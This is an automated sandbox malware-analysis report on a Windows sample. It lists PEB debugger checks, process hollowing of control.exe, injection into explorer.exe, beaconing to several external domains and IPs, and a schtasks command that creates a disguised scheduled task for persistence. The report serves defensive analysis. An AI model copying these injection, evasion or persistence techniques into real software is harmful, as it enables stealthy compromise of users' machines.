Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AB944 mov eax, dword ptr fs:[00000030h]	20_2_050AB944
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C3D43 mov eax, dword ptr fs:[00000030h]	20_2_050C3D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05103540 mov eax, dword ptr fs:[00000030h]	20_2_05103540
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A7D50 mov eax, dword ptr fs:[00000030h]	20_2_050A7D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508C962 mov eax, dword ptr fs:[00000030h]	20_2_0508C962
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508B171 mov eax, dword ptr fs:[00000030h]	20_2_0508B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508B171 mov eax, dword ptr fs:[00000030h]	20_2_0508B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AC577 mov eax, dword ptr fs:[00000030h]	20_2_050AC577
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AC577 mov eax, dword ptr fs:[00000030h]	20_2_050AC577
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]	20_2_05082D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]	20_2_05082D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]	20_2_05082D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]	20_2_05082D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]	20_2_05082D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AC182 mov eax, dword ptr fs:[00000030h]	20_2_050AC182
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BA185 mov eax, dword ptr fs:[00000030h]	20_2_050BA185
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BFD9B mov eax, dword ptr fs:[00000030h]	20_2_050BFD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BFD9B mov eax, dword ptr fs:[00000030h]	20_2_050BFD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B2990 mov eax, dword ptr fs:[00000030h]	20_2_050B2990
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B35A1 mov eax, dword ptr fs:[00000030h]	20_2_050B35A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B61A0 mov eax, dword ptr fs:[00000030h]	20_2_050B61A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B61A0 mov eax, dword ptr fs:[00000030h]	20_2_050B61A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]	20_2_051051BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]	20_2_051051BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]	20_2_051051BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]	20_2_051051BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051069A6 mov eax, dword ptr fs:[00000030h]	20_2_051069A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]	20_2_050B1DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]	20_2_050B1DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]	20_2_050B1DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05138DF1 mov eax, dword ptr fs:[00000030h]	20_2_05138DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]	20_2_0508B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]	20_2_0508B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]	20_2_0508B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509D5E0 mov eax, dword ptr fs:[00000030h]	20_2_0509D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509D5E0 mov eax, dword ptr fs:[00000030h]	20_2_0509D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051141E8 mov eax, dword ptr fs:[00000030h]	20_2_051141E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05154015 mov eax, dword ptr fs:[00000030h]	20_2_05154015
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05154015 mov eax, dword ptr fs:[00000030h]	20_2_05154015
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]	20_2_05107016
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]	20_2_05107016
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]	20_2_05107016
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]	20_2_05141C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]	20_2_0515740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]	20_2_0515740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]	20_2_0515740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]	20_2_05106C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]	20_2_05106C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]	20_2_05106C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]	20_2_05106C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]	20_2_0509B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]	20_2_0509B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]	20_2_0509B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]	20_2_0509B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]	20_2_050B002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]	20_2_050B002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]	20_2_050B002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]	20_2_050B002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]	20_2_050B002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BBC2C mov eax, dword ptr fs:[00000030h]	20_2_050BBC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BA44B mov eax, dword ptr fs:[00000030h]	20_2_050BA44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511C450 mov eax, dword ptr fs:[00000030h]	20_2_0511C450
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511C450 mov eax, dword ptr fs:[00000030h]	20_2_0511C450
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A0050 mov eax, dword ptr fs:[00000030h]	20_2_050A0050
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A0050 mov eax, dword ptr fs:[00000030h]	20_2_050A0050
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05151074 mov eax, dword ptr fs:[00000030h]	20_2_05151074
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05142073 mov eax, dword ptr fs:[00000030h]	20_2_05142073
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A746D mov eax, dword ptr fs:[00000030h]	20_2_050A746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089080 mov eax, dword ptr fs:[00000030h]	20_2_05089080
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509849B mov eax, dword ptr fs:[00000030h]	20_2_0509849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05103884 mov eax, dword ptr fs:[00000030h]	20_2_05103884
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05103884 mov eax, dword ptr fs:[00000030h]	20_2_05103884
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C90AF mov eax, dword ptr fs:[00000030h]	20_2_050C90AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BF0BF mov ecx, dword ptr fs:[00000030h]	20_2_050BF0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BF0BF mov eax, dword ptr fs:[00000030h]	20_2_050BF0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BF0BF mov eax, dword ptr fs:[00000030h]	20_2_050BF0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	20_2_0511B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511B8D0 mov ecx, dword ptr fs:[00000030h]	20_2_0511B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	20_2_0511B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	20_2_0511B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	20_2_0511B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]	20_2_0511B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05158CD6 mov eax, dword ptr fs:[00000030h]	20_2_05158CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]	20_2_05106CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]	20_2_05106CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]	20_2_05106CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050858EC mov eax, dword ptr fs:[00000030h]	20_2_050858EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051414FB mov eax, dword ptr fs:[00000030h]	20_2_051414FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511FF10 mov eax, dword ptr fs:[00000030h]	20_2_0511FF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511FF10 mov eax, dword ptr fs:[00000030h]	20_2_0511FF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BA70E mov eax, dword ptr fs:[00000030h]	20_2_050BA70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BA70E mov eax, dword ptr fs:[00000030h]	20_2_050BA70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0514131B mov eax, dword ptr fs:[00000030h]	20_2_0514131B
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0515070D mov eax, dword ptr fs:[00000030h]	20_2_0515070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0515070D mov eax, dword ptr fs:[00000030h]	20_2_0515070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AF716 mov eax, dword ptr fs:[00000030h]	20_2_050AF716
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05084F2E mov eax, dword ptr fs:[00000030h]	20_2_05084F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05084F2E mov eax, dword ptr fs:[00000030h]	20_2_05084F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BE730 mov eax, dword ptr fs:[00000030h]	20_2_050BE730
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508DB40 mov eax, dword ptr fs:[00000030h]	20_2_0508DB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509EF40 mov eax, dword ptr fs:[00000030h]	20_2_0509EF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05158B58 mov eax, dword ptr fs:[00000030h]	20_2_05158B58
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508F358 mov eax, dword ptr fs:[00000030h]	20_2_0508F358
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508DB60 mov ecx, dword ptr fs:[00000030h]	20_2_0508DB60
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509FF60 mov eax, dword ptr fs:[00000030h]	20_2_0509FF60
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B3B7A mov eax, dword ptr fs:[00000030h]	20_2_050B3B7A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B3B7A mov eax, dword ptr fs:[00000030h]	20_2_050B3B7A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05158F6A mov eax, dword ptr fs:[00000030h]	20_2_05158F6A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]	20_2_05107794
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]	20_2_05107794
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]	20_2_05107794
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05091B8F mov eax, dword ptr fs:[00000030h]	20_2_05091B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05091B8F mov eax, dword ptr fs:[00000030h]	20_2_05091B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0513D380 mov ecx, dword ptr fs:[00000030h]	20_2_0513D380
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BB390 mov eax, dword ptr fs:[00000030h]	20_2_050BB390
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B2397 mov eax, dword ptr fs:[00000030h]	20_2_050B2397
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05098794 mov eax, dword ptr fs:[00000030h]	20_2_05098794
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0514138A mov eax, dword ptr fs:[00000030h]	20_2_0514138A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]	20_2_050B4BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]	20_2_050B4BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]	20_2_050B4BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05155BA5 mov eax, dword ptr fs:[00000030h]	20_2_05155BA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051053CA mov eax, dword ptr fs:[00000030h]	20_2_051053CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051053CA mov eax, dword ptr fs:[00000030h]	20_2_051053CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]	20_2_050B03E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]	20_2_050B03E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]	20_2_050B03E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]	20_2_050B03E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]	20_2_050B03E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]	20_2_050B03E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C37F5 mov eax, dword ptr fs:[00000030h]	20_2_050C37F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05098A0A mov eax, dword ptr fs:[00000030h]	20_2_05098A0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]	20_2_0508C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]	20_2_0508C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]	20_2_0508C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B8E00 mov eax, dword ptr fs:[00000030h]	20_2_050B8E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A3A1C mov eax, dword ptr fs:[00000030h]	20_2_050A3A1C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BA61C mov eax, dword ptr fs:[00000030h]	20_2_050BA61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BA61C mov eax, dword ptr fs:[00000030h]	20_2_050BA61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508AA16 mov eax, dword ptr fs:[00000030h]	20_2_0508AA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508AA16 mov eax, dword ptr fs:[00000030h]	20_2_0508AA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C4A2C mov eax, dword ptr fs:[00000030h]	20_2_050C4A2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C4A2C mov eax, dword ptr fs:[00000030h]	20_2_050C4A2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508E620 mov eax, dword ptr fs:[00000030h]	20_2_0508E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0513FE3F mov eax, dword ptr fs:[00000030h]	20_2_0513FE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05114257 mov eax, dword ptr fs:[00000030h]	20_2_05114257
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]	20_2_05089240
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]	20_2_05089240
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]	20_2_05089240
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]	20_2_05089240
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]	20_2_05097E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]	20_2_05097E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]	20_2_05097E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]	20_2_05097E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]	20_2_05097E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]	20_2_05097E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509766D mov eax, dword ptr fs:[00000030h]	20_2_0509766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0513B260 mov eax, dword ptr fs:[00000030h]	20_2_0513B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0513B260 mov eax, dword ptr fs:[00000030h]	20_2_0513B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C927A mov eax, dword ptr fs:[00000030h]	20_2_050C927A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05158A62 mov eax, dword ptr fs:[00000030h]	20_2_05158A62
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]	20_2_050AAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]	20_2_050AAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]	20_2_050AAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]	20_2_050AAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]	20_2_050AAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0511FE87 mov eax, dword ptr fs:[00000030h]	20_2_0511FE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BD294 mov eax, dword ptr fs:[00000030h]	20_2_050BD294
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BD294 mov eax, dword ptr fs:[00000030h]	20_2_050BD294
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]	20_2_050852A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]	20_2_050852A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]	20_2_050852A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]	20_2_050852A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]	20_2_050852A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]	20_2_05150EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]	20_2_05150EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]	20_2_05150EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_051046A7 mov eax, dword ptr fs:[00000030h]	20_2_051046A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509AAB0 mov eax, dword ptr fs:[00000030h]	20_2_0509AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509AAB0 mov eax, dword ptr fs:[00000030h]	20_2_0509AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BFAB0 mov eax, dword ptr fs:[00000030h]	20_2_050BFAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B2ACB mov eax, dword ptr fs:[00000030h]	20_2_050B2ACB
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05158ED6 mov eax, dword ptr fs:[00000030h]	20_2_05158ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B36CC mov eax, dword ptr fs:[00000030h]	20_2_050B36CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C8EC7 mov eax, dword ptr fs:[00000030h]	20_2_050C8EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0513FEC0 mov eax, dword ptr fs:[00000030h]	20_2_0513FEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B16E0 mov ecx, dword ptr fs:[00000030h]	20_2_050B16E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050976E2 mov eax, dword ptr fs:[00000030h]	20_2_050976E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050B2AE4 mov eax, dword ptr fs:[00000030h]	20_2_050B2AE4

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Code function: 6_2_00409B20 LdrLoadDll,

6_2_00409B20

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tjandamber.com
Source: C:\Windows\explorer.exe	Domain query: www.fraktal.media
Source: C:\Windows\explorer.exe	Domain query: www.expertexceleratorchallenge.com
Source: C:\Windows\explorer.exe	Network Connect: 52.25.92.0 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.d0berman245.xyz
Source: C:\Windows\explorer.exe	Domain query: www.cherrybunk.life
Source: C:\Windows\explorer.exe	Domain query: www.hellocharmaine.com
Source: C:\Windows\explorer.exe	Domain query: www.syzhtr.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 99.83.154.118 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.72.144.19 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: E60000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Memory written: C:\Users\user\Desktop\tgamf4XuLa.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3388			Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'	Jump to behavior
